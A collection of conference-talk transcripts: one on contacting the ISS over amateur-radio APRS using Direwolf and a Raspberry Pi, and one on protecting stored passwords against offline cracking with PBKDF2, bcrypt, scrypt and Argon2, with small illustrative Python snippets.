Direwolf is just an apt-get install. If you check out the GitHub page, you'll find instructions on how to set it up, as well as my configuration files to look at and mess with, so you don't have to recreate everything from scratch. When you install Direwolf, it also installs kissutil, which is what I use to feed messages into Direwolf for transmission. Then there's a tool called Xastir; I don't know how you actually say it because it has an X and a "stir" in it, so I assume that's how you say it. It's more of a GUI tool you can run on the Raspberry Pi, which is kind of neat because it automatically plots where radio transmissions are coming from as they come in over APRS. So if you're receiving with Direwolf and have Xastir up, you can see all the beaconing devices and other APRS transmitters out and about, which is really cool when the ISS goes over and all of a sudden you have to zoom way out to see, wow, there are all these people transmitting from all over the world. The last time I did this I got a contact from Canada, and I'm in Central California, so it's crossing over at least two states and a good part of California as well. I thought that was kind of neat. Those are the applications to look at if this is something you're interested in. There are also a lot of APRS applications for phones. I use the Raspberry Pi, so I've only checked out a couple of them for iOS and haven't played with any of the Android ones, so I'd just recommend trying an app; you can get trials of most of them. Hook up an audio jack to your phone, plug it into your Baofeng, and you're off to the races. Your phone is kind of the perfect device for this: it has a battery, it has GPS, it has a nice touch screen, and it can encode audio like nobody's business. Like I said, before you'd have a desk full of equipment, and now it's a phone and a radio with an audio cable in between; that's all that's really required. Let's see. So the next part is planning your pass, knowing when the ISS is going to be overhead. This is a screenshot from my app when I was doing the slides; I use an application called GoSatWatch. It's for iOS, and it gives you a little bit of augmented reality, which I really like. From this screen you can see where the International Space Station currently is and what its orbit is. It gives you statistics: you can see it's at about 264 miles, that's its altitude (I don't know the technical satellite term for it), and it's going about 17,000 miles an hour. You can also see how far it is relative to where you are. And what's nice is that if you're trying to digipeat off of the ISS, this app lets you hit the sky button down below and actually hold up your phone.
And since it has the compass and everything built in, it can orient you as to where to point your antenna in the sky to get your best transmission, your best point of contact. It gives you live stats, it'll notify you of good passes, and based on where you are you can see all the different times of day or night when the ISS is going to come over. It also covers a ton of other satellites, which is something I probably neglected to mention: this talk is just about the ISS, but there are tons of other satellites out there that perform basically the same operations. All right, sorry, I had to resume it. But yeah, this application is great. I think it was $7 in the App Store, but there are plenty of other applications that do similar things, so it's worth checking a few out. The other thing I really like about it is that it notifies you, and you can point the app up and see where in the sky the ISS is, and that matters for a couple of reasons I'll go over in a second. When you're planning your pass, you also have to take the Doppler effect into account. I really like Sheldon's Doppler effect costume from The Big Bang Theory, if anyone's seen it; I just had to throw it in there. But you've all heard the Doppler effect before: an ambulance or police car going by, like the little graphic down below. If it's going away from you, the sound appears lower in pitch because the wavelength is stretched, and as the car approaches you, it's higher pitched because the wavelength is compressed relative to the moving object. Because the International Space Station is traveling at 17,000 miles an hour relative to where you are on the planet, the frequency it transmits on appears Doppler shifted. When it's coming toward you, you'll hear it at a higher frequency, roughly 145.825 MHz plus 3.5 kHz, and as it's leaving you, moving away, the wavelength is longer and the frequency is lower. I hope I got that the right way around; if not, you still understand that depending on where you are on the planet and whether the ISS is approaching or leaving you, the frequency you tune your radio to changes slightly. Personally, what I do is try to find a pass where the International Space Station goes as close to directly overhead as possible, because then there's essentially no Doppler shift I have to account for. A single pass is about five minutes, so you don't have a lot of time to fiddle with your radio and readjust anything. So that's one thing to take into account: try to find a pass where the ISS comes as close to overhead as possible. You can Google this online, you don't even need an app for it, but I've personally found that having the app makes it easier to make longer-distance contacts, because if the International Space Station is directly above you and you send a signal to it, it's going to digipeat that signal right back down below you.
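For a rough feel for where that plus or minus 3.5 kHz figure comes from, here is a small worked example in Python; the constants are my own round numbers for illustration, not values from the talk.

# Back-of-the-envelope Doppler shift for the ISS packet frequency.
F_ISS = 145.825e6          # ISS APRS frequency, Hz
C = 299_792_458            # speed of light, m/s
ISS_SPEED = 7_660          # orbital speed, m/s (roughly 17,000 mph)

def doppler_shift(radial_velocity_ms: float) -> float:
    """Apparent frequency shift in Hz for a given line-of-sight velocity."""
    return F_ISS * radial_velocity_ms / C

# Worst case: the ISS moving almost straight toward or away from you,
# which only happens when it is low on the horizon.
print(f"max shift: +/- {doppler_shift(ISS_SPEED) / 1e3:.1f} kHz")

The worst case works out to roughly plus or minus 3.7 kHz near the horizon, while directly overhead the line-of-sight velocity is close to zero, which is exactly why picking a near-overhead pass lets you mostly ignore retuning.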
So with an overhead pass you're not going to get a contact that's very far away, or at least not as far as you could possibly get. If you're trying to get your signal as far as possible, the optimal thing is to hit the International Space Station near the edge of its footprint and have it repeat you into an area far away from you. You can see on the slide the size of the area the International Space Station covers: at any given point you can hit a large portion of whatever land mass it's over, Asia and Europe in this view, and when it flies over the United States it covers a good chunk; when it flies over California you can hit Idaho or Colorado, depending on where its orbit is. Okay, so this was the hardest part for me: finding out how to actually send a message. I didn't think it would be as difficult as it was, but I was using a Raspberry Pi and trying to do everything on the command line, and maybe I was making it more difficult for myself than I really needed to. I could have used my phone and it would have been easier, but with some of the plans I have going forward, I'd rather do this in a more automated fashion. So I use screen; you can use tmux, multiple PuTTY sessions, or whatever you want to connect to your Raspberry Pi. Essentially I had three separate screens. One ran Direwolf with my Direwolf configuration: -c points at the config file, and -t 0 turns off color in the output. Then there's kissutil, which is installed when you install Direwolf, and I point it at an RX folder and a TX folder: anything I receive lands in the RX folder, and anything I want to transmit goes in the TX folder. That's really nice because I can just drop text files in there, and kissutil and Direwolf take care of converting them to audio and transmitting them out, which is awesome, because at that point you can script up whatever you want and do things in an automated or manual way. But again, you only have five minutes or so to communicate with the International Space Station, and an even narrower window when it's directly above you, which is kind of prime time. You want everything set up so you can send a single message per pass, or maybe just a handful of messages per pass, because there are other people also trying to communicate with it. And remember, the International Space Station is operating on a single frequency, 145.825 MHz (I don't know if I put that in the notes, but you can Google it, it's out there), and only one person can talk to the International Space Station at a time. So you don't want to be constantly transmitting, because then you'll prevent other people from communicating with it. So basically, on, I believe, an every-minute interval, I would have it copy my message.txt into the transmit folder, and it would shoot that message off, or transmit it, I should say.
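As a sketch of that every-minute copy, assuming kissutil is running and watching a transmit directory as described (the paths, interval, and file names here are placeholders, not the exact setup from the talk):

# Minimal beacon loop: drop a pre-built APRS packet line into the folder
# that kissutil is watching, once per minute, while a pass is in progress.
import shutil, time
from pathlib import Path

TX_DIR = Path.home() / "tx"                   # kissutil transmit-queue folder (assumed)
MESSAGE_FILE = Path.home() / "message.txt"    # the pre-built packet line to send
INTERVAL_S = 60                               # be polite: one transmission per minute at most

while True:
    # Each file dropped here is treated by kissutil as a line to encode and transmit.
    shutil.copy(MESSAGE_FILE, TX_DIR / f"msg_{int(time.time())}.txt")
    time.sleep(INTERVAL_S)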
And what's kind of neat about this is that you can script it up however you want, so if you have a program that you want to constantly send things out automatically, you can. Personally, I like that. But if you're just trying to make a contact, if being digipeated off the International Space Station is your only goal, you can just send the message manually from your phone; you don't have to go through all this Direwolf craziness, and most phone applications can do it pretty easily. All right, so this is a sample message, and I'll decipher it real quick. You see KJ60HH, that's my call sign, followed by APRS, and then ARISS, which indicates that I want to be digipeated by the International Space Station. Then you'll see my call sign again followed by a dash seven, because this is coming from my mobile unit, which is just my Baofeng radio. After that you'll see my GPS coordinates; they're in kind of a funny format, not one I'm used to seeing, but it's not hard to figure out what they mean. Then there's a dash, and after that dash is just whatever message you'd like to send to the International Space Station. So it's not super difficult to decipher, but if it's your first time looking at APRS messages, it might be a little more difficult than you'd anticipate. This is the folder structure: when I run Direwolf, I run it from my home directory, the Direwolf config is right there, and then I have a TX and an RX folder; messages I'm going to send go into the TX folder, and messages I receive get placed in the RX folder. Let's see if I can get this. All right, so some of the things going forward that I think are important to cover. My goal is to automate this. I want to build some rotators; rotators, if you're not familiar, would let me change the azimuth through 360 degrees, like a compass, and the elevation up and down, like on a tripod. Because it would be really cool if the Raspberry Pi had software that tracked where the International Space Station was and, any time it was overhead, transmitted a message automatically. That's my idea of what would be kind of neat, so we'll see how that goes. I'd also like to see how far away I can hear from, or how far away I could be digipeated by the International Space Station. If you think about it, out at the horizon would be zero degrees of elevation, but there are trees, houses, all those things in the way, so there's a point at which you can actually hit the International Space Station with a signal: is it 20 degrees, 30 degrees, 40 degrees? The higher its elevation is relative to where you are on the ground, the easier it is to communicate with it. So automating that, I think, would be kind of neat, and I'd also like to investigate other satellites and just see what else is out there.
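Going back to the sample message and the TX folder just described, here is a hedged sketch of building that kind of position-report line and writing it where kissutil can pick it up. The call sign, coordinates, and comment are placeholders, and the field layout follows the common SOURCE>DEST,PATH:payload convention rather than anything copied from the slide.

# Build an APRS position report requesting the ISS digipeater, then save it
# as message.txt for the beacon loop above.
CALLSIGN = "N0CALL-7"        # -7 SSID is a common convention for a handheld/mobile unit
PATH = "ARISS"               # ask the ISS digipeater to repeat the packet
LAT = "3721.50N"             # latitude in ddmm.mm format used by APRS position reports
LON = "12154.30W"            # longitude in dddmm.mm format
COMMENT = "Hello from Central California via the ISS"

packet = f"{CALLSIGN}>APRS,{PATH}:!{LAT}/{LON}-{COMMENT}"
print(packet)
with open("message.txt", "w") as f:
    f.write(packet + "\n")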
A huge thank you to AMSAT and ARISS.net, because checking out that website is what inspired me to try to get on the air, and the same goes for AMSAT; there's a ton of great information there on how other people have made successful contacts. And really, at the end of the day, I think this is just something that's cool: the hacker mindset of scraping and cobbling all these things together to do something as neat as transmitting to the International Space Station. Not to mention that this is also how you can transmit to a lot of other satellites; it really covers the basics of what's required to talk to a satellite. There are a whole bunch of different satellite orbits, communication protocols, frequencies, and modulations, and this is just dipping your toe in the water of what's available and what's out there. And it's an honestly pretty small budget: for $100 or $200 you can get a really solid setup to communicate with the International Space Station or other satellites, with just a ham license, just being an amateur radio operator. And if you just want to listen to what gets transmitted, you can do that without a license; you can just get a Baofeng radio and your phone, and it doesn't even have to be a directional antenna at that point. If you just want to listen, an omnidirectional antenna, basically a longer version of the normal stick antenna that comes with the Baofeng, will do. Again, I'll post links to everything on that GitHub page. But yeah, at the end of the day, this is a great way to get started if it's something you're interested in, and from there, who knows how much farther you can level up and what other satellite communications you can do. You can spend thousands and thousands of dollars and sink a full-time work week into all of this stuff, even as an amateur, so it definitely helps to have a good starting point, something you can measurably check off a list and do. And again, I know I've said it a bunch of times, but if you have kids at home, or if you're a kid at home, this is a great project to get your feet wet, and you learn a ton of different principles, from physics to radio to computers to protocols. There are so many small lessons intertwined that I think it's one of those perfect projects to figure out whether ham radio operating is for you, whether chasing satellites across the sky is for you. So again, I encourage you to take a look at it. Feel free to check out the GitHub page; I'll post my contact information there along with links to all the hardware and apps and everything else I've mentioned. And yeah, I hope you enjoyed the talk. Let me see how I pause this thing. All right. Thank you for that great talk. We have Eric here who will take the Q&A. I think one of the questions that came up in the Twitch chat first was whether the person was actually hit by that police car; they were a little worried about that. Can you hear me, Eric? I don't know if Eric can hear us here. We can't hear you. Are you talking, Eric? Hello, Eric. Yeah, I can hear you fine.
I don't think, uh, I think our speaker is having some technical difficulties. So what we'll do is he'll just hang around and chat in the village on the channels there. And if you have any questions, he'll follow up certainly in text and maybe on one of the voice channels in there. Alrighty. Thanks everybody for attending and hope you all enjoy the talk. I thought it was pretty, pretty awesome. And I'll go from here.
|
Reaching out into space may seem like it would require a PhD and thousands of dollars of equipment, but it can actually be done for about $100. In this talk I will detail how to get started talking to satellites using basic equipment. With just a Ham Radio license and some gear, you too can talk to satellites and by extension people thousands of miles away.
|
10.5446/51625 (DOI)
|
Good afternoon, good evening, or even good morning, depending on which part of the world you are listening to this talk from. And no, it does not get old: I still want to give a huge shout out to the Crypto Village organizing community for making this virtual con happen for us. Welcome to the second talk of the day from my side. In this talk, I'm going to touch upon how to store sensitive information securely so that we can safeguard it reasonably well against any kind of offline cracking attempt. Before we go ahead, I'd like to introduce myself. I'm Anshit Sheth. I work as a security researcher at a leading static analysis company called Veracode. My primary responsibility here is to be on top of the latest and greatest happenings in the security field, more specifically in the application security domain, and transfer that knowledge to make sure our customers are safe. I'm a huge crypto enthusiast. I have spent a reasonable amount of time understanding different basic crypto building blocks, their practical implementations, and how they can be used in the real world. I understand a lot of anti-patterns; I've spent a lot of time looking at different crypto implementations across programming languages, and I try to translate all this expertise into making sure our customers' businesses are safe and into helping pick up any anti-patterns. Recently I got thinking: why are we seeing so many data breaches in the first place? Eventually I realized, okay, this is going to be a matter of when rather than if. So what can we do to protect this information once it is already breached, mainly from any kind of offline cracking? How can we make the cracking process so expensive that the stolen information is almost useless? In that quest, the first thing that comes to anyone's mind would be Troy Hunt's well-organized, very informative site about breaches, Have I Been Pwned. On this site he keeps a database of all the breaches which have happened in probably the last decade and gives out information about what might have happened, what has happened, and all that kind of neat stuff. So instead of putting up a big slide of shame, who got hacked and for what reasons, what I tried to do was look at all the domains which were breached and what kind of mechanism they were using for storing any kind of sensitive information. This is what my analysis says: there were around 453 unique domains; 13% were storing it in plain text, 20% as hashes without any salting, 30% as salted hashes, around 15% were using key derivation functions, which is a great step, and roughly 23% decided not to disclose, which in my opinion means plain text, but no judgments here. Looking at it, I was thinking, okay, why were they breached in the first place? Most of the time it was because they did not pay a lot of attention to other kinds of security issues in their applications. A lot of them were simple SQL injections where entire databases were dumped out; open S3 buckets were not an uncommon thing; and there were a lot of unprotected endpoints which leaked this data. That was my first lesson: why are these things happening? Then my focus turned toward thinking, okay, this breach has already happened, or these breaches are always going to keep happening, sometimes even for innocent reasons. Well, there is nothing innocent about security.
So my next thing was, okay, what happens after these breaches are done? My first thought was, wow, modern computer architecture is getting cheaper and cheaper and it's going to keep getting cheaper from now on. All these modern GPUs with extremely high parallelization capabilities can crack these things in minutes, making passwords much cheaper to recover with any kind of offline mechanism. With the whole Bitcoin mining philosophy, there are so many ASICs, application-specific integrated circuits, out there that make the cost of cracking much cheaper; there are literally trillions of hashes happening within seconds, and this can easily be turned against any basic crypto primitive. All these things are going to keep making password cracking cheaper with time. So what should we do? Well, the need of the hour was always stretching this computation out, so that we have to throw a lot of computational resources, CPU and memory, at computing each password. With that, we greatly slow down the speed at which candidate passwords can be calculated. This greatly increases the offline cracking time, making us resilient toward modern computer architectures, brute forcing, time-memory trade-off attacks, rainbow tables, dictionary attacks, all those kinds of things. That's what we really needed, and how did we achieve it? Using key derivation functions. This concept of a key derivation function isn't specific to password hashing or secret-information hashing; in fact, it came into existence for creating key material out of low-entropy inputs. But at that time, when everyone was in this cat and mouse race, people realized KDFs are much better suited than simply storing things as plain or salted hashes; information can be much better safeguarded that way. And thus this whole philosophy of using key derivation functions, KDFs, came into the picture. So, simply, how does this work? Underlying it there is still an algorithm which iterates hundreds, thousands, and sometimes a couple of million times over a basic crypto primitive. Functions of this type are called adaptive functions. The more mature ones also throw a little, or sometimes a lot, of memory at this iterative process, which slows offline cracking even further, often by a factor of four or more. It still takes a password and a salt and gives out a fixed-length hash, and it's the work factor which can be tuned based on the hardware your application is deployed on. That's going to be the base of our talk today: how to safeguard against most offline cracking mechanisms. Some design considerations I'd like to point out: try to save your password hash and salt in completely different places, a distributed database, or maybe a database and a property file; they should not sit right next to each other. Obviously, you're not going to store the password in plain text anymore. I can even go as far as saying that maybe we can have different work factors for different information we are trying to safeguard, or even different logins can have different work factors, and the work factor used should be stored along with the hash, obviously. And as memory and CPU keep getting cheaper, you should routinely check that work factors are incremented accordingly, to keep making offline password cracking expensive.
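Purely to illustrate what a tunable work factor means, here is a toy sketch in Python; it is not something to use for real storage (the proper KDFs discussed below are the whole point of this talk), just a picture of "iterate a primitive until it costs about a second."

# Toy adaptive construction, for illustration only: salt the password and
# re-hash it many times, raising the iteration count until ~1 second passes.
import hashlib, os, time

def toy_kdf(password: bytes, salt: bytes, iterations: int) -> bytes:
    digest = salt + password
    for _ in range(iterations):
        digest = hashlib.sha256(digest).digest()
    return digest

salt = os.urandom(16)
start = time.perf_counter()
toy_kdf(b"correct horse battery staple", salt, 2_000_000)
print(f"{time.perf_counter() - start:.2f}s")   # tune the count toward ~1s on your hardware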
Lastly, how expensive is tolerable or acceptable? The industry standard for any kind of interactive login is that a latency of around one second is very acceptable, so make sure you tune your work factors so that the output is calculated in around a second. That is an acceptable latency, and it still increases the offline cracking time by a huge margin. And if the password you are trying to protect is not going to be involved in interactive logins, for example your hard disk encryption, a latency of around five to six seconds is quite acceptable in that scenario. Those are the things I wanted to say about key derivation functions in general. Let's start talking about the different key derivation functions in existence, starting with adaptive functions. One of the oldest and most widely adopted is PBKDF2; again, it came into the picture because people really needed to generate key material. This function is the only government-approved function right now, so if you really have to comply with government standards (I really wish you don't), then this is probably your only option, unfortunately. This function is also used as a crypto primitive inside other, more modern functions. Let's see how it actually works internally. Just like our generic KDF, it still takes a password and a salt and gives out a password hash, and you can configure the size you expect out of the hash; this feature exists mostly because block ciphers require keys of a fixed size. The work factor is the iteration count. A little about the internal working of this algorithm: it iterates a pseudo-random function, usually an HMAC; based on the desired output length and the output size of the internal hash used in the HMAC, different blocks are generated, each block is iterated the configured number of times, and the outputs are concatenated; that's your password hash. You will see things in green here: what I have done is write a tool which does parameter tuning for me, based on the rules of thumb I mentioned earlier about a password being calculated in roughly one second for interactive logins and roughly five seconds for non-interactive ones. Since PBKDF2 is government approved, the guidance says the iteration count, the work factor, should be around 10,000, which is way too low; please don't do that, please use something higher. For reasonable hardware on which most typical web applications would be deployed today, an EC2 T2 instance with roughly 8 GB of RAM and an x86 architecture, I ran this tool and the number of iterations came out to around 1.5 million for just one second of computation. Just imagine how far off the government standards are here. So whichever algorithm you decide to use among all the ones we're going to talk about, please run some kind of tuning utility to pick your parameters. I'll be open-sourcing this tool; feel free to grab it and run it on your deployment hardware to tune your work factor accordingly. One thing you should watch for when choosing this algorithm: please choose your output length to be less than or equal to the output size of the internal hash you're using, because going longer unnecessarily takes a lot of extra processing power for no added value. That's one of my suggestions.
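For reference, here is a minimal PBKDF2 sketch with Python's standard library, timed so you can do the same kind of tuning on your own hardware; the iteration count is just the ballpark figure from above, not a recommendation.

# PBKDF2-HMAC-SHA256 via the standard library, timed for work-factor tuning.
import hashlib, os, time

password = b"correct horse battery staple"
salt = os.urandom(16)          # stored with (ideally apart from) the hash
iterations = 1_500_000         # raise or lower until one computation takes ~1s

start = time.perf_counter()
# dklen=32 keeps the output no longer than SHA-256's digest, as advised above.
key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=32)
print(f"{iterations} iterations took {time.perf_counter() - start:.2f}s")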
In this algorithm you can only configure the CPU time involved; there is no memory involved. It is still not at all resilient toward brute-forcing attempts, because of the highly parallelizable nature of very cheaply rentable GPUs in today's time. If you don't have to comply with government standards, please move on and use better, memory-hard functions. The next notable mention is bcrypt, which is still very commonly used. It is based on an already-deprecated symmetric cipher called Blowfish. It involves a little bit of memory in its internal working, so that's where it is slightly better than PBKDF2, but the amount of memory it uses is not tunable by the user. And again, it was designed for generating key material, not with storing secrets or password hashing in mind. How does this algorithm work internally? Again we have a password, a fixed-size salt, and a password hash as output. The iteration count is specified logarithmically, so a cost of 14 means 2 to the 14 iterations. Internally, it has a very expensive Blowfish-based key setup process which involves some memory; it iterates around that key setup, the result is then run through the normal Blowfish algorithm, and the output is given to the caller. It is still a little better than PBKDF2 because of the internal RAM usage, but it is still very susceptible to brute-forcing attacks, maybe just slightly more expensive than the previous one. And I don't understand why people still reach for bcrypt, though I've seen a lot of usage of it: if you don't even have to comply with government standards, why not use the more modern memory-hard functions? Okay, let's start talking about a few memory-hard functions, the first one being scrypt. It's one of the very early generation functions with memory hardness built in. It has seen increasing adoption in cryptocurrencies, mainly because cryptocurrencies don't really need to worry about the time-memory trade-off attacks that offline cracking defenses do, and need to be more worried about side-channel attacks, which are not a concern for offline cracking. So it's mainly the nature of those applications that explains its wide adoption in cryptocurrencies; it's not that it's more or less secure for other applications. It was still designed for key material, but there have been a lot of promising results in using it against offline cracking. Okay, let's see how it works. It still takes a password and a salt and gives out a password hash whose length you can configure. And if you look, the work factor has grown from one parameter to almost three at this point. Not all functions give you the freedom to tune every resource, but this is a huge step in the right direction, with memory hardness involved. There is parallelization, so you can parallelize the computation; I would note that not all implementations expose this control to the user, it depends on the implementation. You would also note that there is only one parameter which controls both the CPU resources and the memory involved: basically it does not differentiate between the two resources we can throw at the algorithm.
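Before going further into scrypt, here is a minimal bcrypt sketch for the logarithmic work factor just described, assuming the third-party Python bcrypt package; the cost value is illustrative, not a prescription.

# bcrypt usage sketch: rounds is the log2 work factor, so 14 means 2^14 iterations.
import bcrypt

password = b"correct horse battery staple"   # note: bcrypt only looks at the first 72 bytes
hashed = bcrypt.hashpw(password, bcrypt.gensalt(rounds=14))
print(hashed)        # salt and work factor are encoded inside the returned hash string

# Verification later needs only the stored hash string.
assert bcrypt.checkpw(password, hashed)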
So, down the line, if we decide that memory is getting cheaper and we should increase the amount of memory used in the algorithm, we don't really have a choice here. And finally there is the block size used internally; typical values are 8 or 16, and it does not make a huge difference, so that's okay. Let's talk a little about how the algorithm works internally. As with PBKDF2, an HMAC is used internally to generate a fixed-size value, which is then looped through this big memory array, with a lot of stream cipher mixing and XORing going on, for the configured number of iterations. The output is then made a fixed size by running it through PBKDF2 again and passed back to the caller. If you choose this, well, it increases the cost of any brute-forcing attempt by a huge margin compared to adaptive functions. But the way the memory is used internally, the sequence of memory locations accessed in consecutive operations depends on the data itself: the consecutive array entries are chosen based on the value being processed, so there is always a predefined sequence of memory accesses for a given input password. What this opens us up to is side-channel attacks. And, as we spoke about earlier, there is no way to tune the CPU and memory independently. Also, since there is a lot of crypto involved in this algorithm, as we saw, HMAC, PBKDF2, the Salsa stream cipher, XORing, and then PBKDF2 again, the more crypto involved, the more complicated and error-prone the implementations become, the more complicated the cryptanalysis becomes, and it is just not as sleek. These are the things you should think about if you decide to go with scrypt. Still, it is a huge step ahead of the adaptive functions: it increases the offline cracking cost by a huge margin, roughly quadrupling it on top of the iteration count. It is a great choice. Well, don't they say save the best algorithm for last? And that's what Argon2 is. Around 2015 there was a competition, the Password Hashing Competition, whose goal was to come up with an algorithm specifically suited to storing secrets and, obviously, safeguarding them against offline cracking. It wasn't as if nobody was thinking about how to safely store information before that; breaches were happening, it was more of a cat and mouse race, and the industry was looking at whatever tools already existed in the cryptography arsenal that could be applied to this particular problem quickly, to safeguard information for as long as possible from offline cracking. Argon2, the winner of this competition, obviously takes care of all the existing attacks we have been talking about so far. It's very resilient against brute forcing and dictionary attacks; it's very hard to just parallelize the computation and start cracking passwords in minutes. The designers were also very cognizant of modern computer architecture, which was maturing, getting cheaper, and will keep getting cheaper, so it's resilient against application-specific integrated circuit architectures and even FPGA arrays. A few years ago there were limited implementations of this algorithm outside of a couple of cryptography libraries, but that situation has greatly changed.
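Before getting into Argon2's parameters, this is roughly what the scrypt usage described above looks like with Python's standard library (it needs an OpenSSL 1.1+ build); the cost values are illustrative starting points, not recommendations.

# scrypt sketch: n is the single CPU/memory cost parameter discussed above,
# r is the block size, p is parallelization. Memory use is roughly 128 * n * r bytes.
import hashlib, os

password = b"correct horse battery staple"
salt = os.urandom(16)

key = hashlib.scrypt(
    password, salt=salt,
    n=2**15, r=8, p=1,            # ~32 MiB; raise n until one computation takes ~1s
    maxmem=64 * 1024 * 1024,      # allow enough memory for the chosen n and r
    dklen=32,
)
print(key.hex())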
So congratulations: you don't have to implement Argon2 yourself. You can pick up almost any programming language and any library in that language, and most of the time there will be an implementation ready to be plugged into your application. So let's see how this algorithm works. You still have your password and salt, and you still get a fixed-length hashed password. In terms of work factors you now have three parameters: parallelization, which you can configure based on the number of CPU cores you have at your disposal; the amount of CPU needed, in terms of the number of iterations; and the memory that can be used by the algorithm, in terms of memory size. So it decouples the two resource costs, very unlike scrypt, and that is one of its huge advantages. There is some cryptanalysis of Argon2 that makes any iteration count below 10 a little questionable, but it is more of a theoretical result, so don't freak out; just choose a value of at least 10, and that's the reason. Talking about modes of operation, which is crucial: there are two main modes in this algorithm, a data-dependent mode, which is essentially what the earlier scrypt algorithm has, and a data-independent mode, which is the better option for password storage; the third is a hybrid of the two working together. To see how these modes differ, let's look at the internal crypto of the algorithm. It first computes a hash of the password, the salt, and all the different parameters; any hash can be used, but usually it is BLAKE2. Then there is a memory array dedicated to it, sized by the memory parameter we give; imagine it as rows and columns being populated iteratively for the configured number of iterations. Now, how do the data-dependent and data-independent modes differ? Each memory block is populated in a sequence, and in the data-dependent mode that sequence is decided by the value of the hash, which depends on the value of the input password, while in the data-independent mode the sequence does not depend on the password at all. So what it comes down to is that in the data-dependent mode the sequence of memory accesses per iteration is based on the input password, and that particular property makes it susceptible to side-channel attacks, which is okay for cryptocurrencies but not very comfortable for password storage. That's why you should use the data-independent mode, where the access sequence does not depend on the secret, which takes away even the issue that scrypt had. Some design considerations: you have to tune your parameters a little more carefully, mostly because you have a few more parameters to take care of. As we talked about, the data-dependent mode is more susceptible to side-channel attacks, while the pure data-independent mode gives up a little resistance to time-memory trade-offs, and that is why there is the hybrid mode, where the first half of the work happens in a data-independent manner and the second half in a data-dependent manner; with that we get the best of both worlds. We are resilient toward side-channel attacks as well as much better off against time-memory trade-off issues. So that's what I would say: use Argon2, mainly in the 2id mode. We already looked at the best parameter options for computing a password hash within about a second.
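For readers following along, here is a sketch of Argon2id in that spirit, assuming the PyNaCl binding of libsodium (the talk's own examples are in Java, so treat the module names here as my assumption); the work factors are only starting points to be tuned toward the one-second target.

# Argon2id via PyNaCl's pwhash module, timed for work-factor tuning.
import time
import nacl.pwhash

password = b"correct horse battery staple"

start = time.perf_counter()
hashed = nacl.pwhash.argon2id.str(
    password,
    opslimit=14,        # number of passes over memory; keep it above ~10
    memlimit=2**27,     # 128 MiB of memory per hash computation
)
print(hashed)           # mode, salt, and both work factors are encoded in the string
print(f"{time.perf_counter() - start:.2f}s")

# Later, verification only needs the stored string.
assert nacl.pwhash.verify(hashed, password)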
Since Argon2 is the algorithm I am highly recommending for any kind of sensitive information storage, I'd like to quickly show how easy it is to start using it with whatever implementation you have access to. To record this demo I had an EC2 instance; these are the details: a typical standard T2 medium with two CPUs and 4 GB of RAM, of which around 2.8 GB was available at that moment, on an x86 architecture and a Linux kernel. So, to see how quickly we can start using this, I am going to use NaCl's password hashing module, where Argon2id is supported. A quick pro tip: whenever you're given a choice of crypto implementation, if you have the option, always go for NaCl. It's very cleanly written, by cryptographers rather than general developers; they deprecate things which are no longer secure or for which better options exist, and quickly remove them from view, so the chances of making wrong choices are pretty much eliminated. Coming back to the code: we are going to use that module, and just to keep track of time we are going to use the time module, with the start time set to the current time. Let's start storing the password. First, let's use the pwhash module's argon2id, and why not use the hybrid mode, best of both worlds, right? And the string output for that. For the password itself, a longer password is better than a shorter, higher-entropy one, so that's what I chose. The ops limit is the number of iterations over the memory array; let's go for 14, since anything around 10 or below has already been theoretically cryptanalyzed, so anything above 10 is great. And the key thing, memory, is again given logarithmically; we already know the answer from our tuning tool. So let's see: this is about as short and sweet as it can get, actually. And just to keep track of time, let's see how long it takes, and hopefully this compiles and runs. Okay, so it took around 1.1 seconds. Can we go any higher? Going from 2^27 to 2^28 takes it to about 2.3 seconds; I leave that choice to you. At this point, this is how you should typically tune any parameters. It's almost second nature to wonder how these functions actually compare against each other. There is not a lot of research done on this topic, on how to put a dollar value or a number of years on cracking a particular breach, and comparing them is a bit apples to oranges, as you can imagine, but good, notable work has been done in these two papers: one released at USENIX a couple of years ago, and another done jointly between Microsoft and Purdue University. In the most trivial terms, what they do is look at the latest hardware and memory costs and work backwards from there, and that's what I tried to do as of yesterday. So for adaptive functions, it's just going to be, again, sorry, a huge list of disclaimers here before I talk about this, very cautiously: I'm assuming the password, the salt, the output, all those things are the same across all these functions, and I'm also assuming there are no electricity costs involved. So, talking about these figures for adaptive functions, it's as simple as the number of iterations per cost of hardware, and the cost of hardware is much easier to calculate these days because most modern ASIC hardware for Bitcoin mining comes with those statistics. Looking at one of the leading pieces of hardware in that department, coming from Antminer, one of the best-configured models is around $2,500 and
it promises to do 110 trillion hashes per second — and a trillion is 10 raised to 12, if you were wondering, as I was. So using that configuration with that number of iterations, an adaptive function is going to take this much time; the point being, it's going to be extremely cheap to just crack these passwords, considering these decently priced machines are going to be in common people's hands very soon. And similarly for memory hard functions — and I want to stress here that this is only for memory hard functions running in the data dependent mode, where the array used for the memory calculations is based on the input password — where again the cost is going to be based more on memory as well as the amount of time it takes, which pretty much quadruples; memory hardness is going to be much more expensive compared to adaptive functions. And this is just for the data dependent mode; for the data independent mode, well, the cost might still be the same but the number of guesses is going to be exponential. So this is just sharing some statistics, still in a more conservative tone. This is all of what I wanted to speak about today around offline cracking: different mechanisms we can use to safeguard ourselves, key derivation functions being the key of that, how to tune different parameters, and what kind of design considerations you should be doing while picking each one of them. Next I'd like to talk a little bit about how all this information can be mapped to storing any kind of secrets you need to. For that you need to sit down and do a little bit of threat modeling for your own usage: something like, what is sensitive to your business, do you need to comply with any GDPR requirements, are you storing any personally identifiable information, can it be used for crafting further attacks against the users whose information might be breached, how are you storing that information, are you storing it in a database, which fields are involved in that database — all those things need to be thought about, and you can easily map all these KDFs to work for your own needs. Lastly, you must have come across countless suggestions and password hygiene requirements or tips over the years, since it is such a key aspect of any kind of authentication mechanism. Just for the completeness of the talk I'd like to say a few things about it: always choose a unique password; password managers are great, please use those; longer passwords are better than shorter, higher entropy ones. This is what I typically do: I store my passwords in a password manager, and this is the configuration I use while generating any new password — I choose a longer password with a reasonable amount of entropy. The point I am trying to make is there is a lot of cryptanalysis done which points us towards the theory that longer passwords are better than shorter ones with higher entropy. So a password whose length is, say, 25 or 30 characters is far better than a password which is of 8 or 10 characters standard length with like two special characters, one uppercase and two digits and those kinds of things — so do that. And the website we looked at about the data breach information — they have a nice API, exposed again by Troy Hunt. It would be great to use that API in your websites, or even password managers can start using that, where if a password which has already been seen in a breach is being used then it would be flagged. And that would go along with, finally, in conclusion: please embrace adaptive key
